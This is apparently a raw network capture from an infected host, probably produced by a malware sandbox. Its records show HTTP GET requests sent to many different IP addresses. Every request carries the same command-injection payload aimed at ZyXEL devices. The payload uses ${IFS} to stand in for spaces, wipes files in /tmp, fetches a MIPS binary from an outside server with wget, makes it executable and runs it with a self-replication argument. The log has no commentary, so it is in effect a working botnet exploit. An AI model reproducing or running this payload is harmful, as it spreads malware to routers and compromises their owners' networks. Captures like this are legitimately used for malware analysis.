                                          Jan 14, 2024 15:46:29.289784908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7431192.168.2.2346876171.88.245.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289793015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7432192.168.2.235703820.170.166.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289841890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7433192.168.2.235896884.247.215.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289874077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7434192.168.2.2334822180.45.225.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289900064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7435192.168.2.234319613.67.55.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289927006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7436192.168.2.2340114196.238.88.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289956093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7437192.168.2.234542036.138.246.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.289987087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7438192.168.2.236067034.150.212.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290003061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7439192.168.2.2358878163.137.198.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290040970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7440192.168.2.234376032.139.241.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290064096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7441192.168.2.2338712186.56.230.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290077925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7442192.168.2.235402290.68.42.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290101051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7443192.168.2.2353698126.42.115.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290149927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7444192.168.2.2337700159.155.209.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290188074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7445192.168.2.2343980119.153.69.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290209055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7446192.168.2.2333464169.16.24.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290250063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7447192.168.2.233437818.240.44.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290277958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7448192.168.2.2347560191.215.44.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290308952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7449192.168.2.234010246.36.174.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290319920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7450192.168.2.2356880148.115.230.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290355921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7451192.168.2.2351366125.148.148.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290364981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7452192.168.2.2333668217.16.56.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290410042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7453192.168.2.2352862136.223.17.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290461063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7454192.168.2.2346416155.103.75.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290492058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7455192.168.2.234535087.114.43.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290517092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7456192.168.2.2357078152.211.128.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290524960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7457192.168.2.2346354135.64.91.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290541887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7458192.168.2.234489695.184.199.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290565014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7459192.168.2.235205096.168.245.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290564060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7460192.168.2.234250035.26.107.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290604115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7461192.168.2.235783866.109.16.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290612936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7462192.168.2.235364665.73.21.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290642023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7463192.168.2.2356110186.20.32.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290688992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7464192.168.2.2334234120.65.231.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290708065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7465192.168.2.2333020158.252.55.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290724993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7466192.168.2.235337050.115.168.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290757895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7467192.168.2.234220880.106.103.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290802956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7468192.168.2.235232859.84.83.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290828943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7469192.168.2.2358350130.230.26.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290828943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7470192.168.2.2359848208.176.16.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290832043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7471192.168.2.2354330166.133.64.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290910006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7472192.168.2.233759464.32.0.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290921926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7473192.168.2.2352516201.167.7.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290941954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7474192.168.2.2350542187.243.198.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290954113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7475192.168.2.2343908177.98.99.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.290976048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7476192.168.2.23378348.199.145.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291007042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7477192.168.2.234774075.106.126.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291044950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7478192.168.2.2333926219.183.82.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291059971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7479192.168.2.2345190204.176.69.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291078091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7480192.168.2.235539667.141.116.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291126966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7481192.168.2.235643827.144.49.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291146994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7482192.168.2.2341116219.71.102.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291183949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7483192.168.2.2343590146.222.255.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291188955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7484192.168.2.233908249.137.3.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291244984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7485192.168.2.2357042113.81.236.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291265965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7486192.168.2.2346236135.199.239.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291309118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7487192.168.2.2339534130.232.150.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291311026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7488192.168.2.2350288118.102.132.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291344881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7489192.168.2.2359908146.253.116.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291346073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7490192.168.2.2357756102.36.250.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291378975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7491192.168.2.2339044136.209.2.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291414976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7492192.168.2.2339328188.217.92.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291434050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7493192.168.2.2351518129.157.27.85443
                                          TimestampBytes transferredDirectionData
